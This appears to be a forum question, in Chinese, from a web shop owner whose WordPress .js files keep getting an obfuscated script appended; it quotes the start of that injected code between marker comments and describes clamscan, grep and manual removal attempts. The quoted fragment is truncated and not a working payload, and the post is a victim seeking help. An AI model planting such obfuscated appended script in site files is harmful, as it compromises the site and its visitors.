我有一个网站,网上商店。
几天前,我的防病毒软件开始发出一些*.js
文件被感染的警告。
我查看了这个受感染的文件,发现末尾附加了以下代码(仅显示了其中的一部分):
/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports? ...
...
/*95d84650ccbbad8b650fac933d031bf0*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65", ... // and so on
/*95d84650ccbbad8b650fac933d031bf0*/
我通过防病毒检查了我的系统,但没有发现任何东西。
clamscan -r --move=/home/USER/VIRUS /
我更新了我的 WordPress 并手动删除了附加在文件末尾的代码*.js
。
过了一段时间,这段代码又出现了。
我试图删除、修改或注释掉它。我试图使用 找到恶意代码grep
,但没有找到任何东西......
没有什么帮助。时间过去了,我所有的*.js
文件现在都“被感染”了。由于我的网站现在被阻止...
我怎样才能找到一个附加的过程是 -
...
/*95d84650ccbbad8b650fac933d031bf0*/
var _0xf19b=["\x6F\x6E\x6C\x6F\x61\x64","\x67\x65\x74\x44\x61\x74\x65", ... // and so on
/*95d84650ccbbad8b650fac933d031bf0*/
在每个*js
文件的末尾?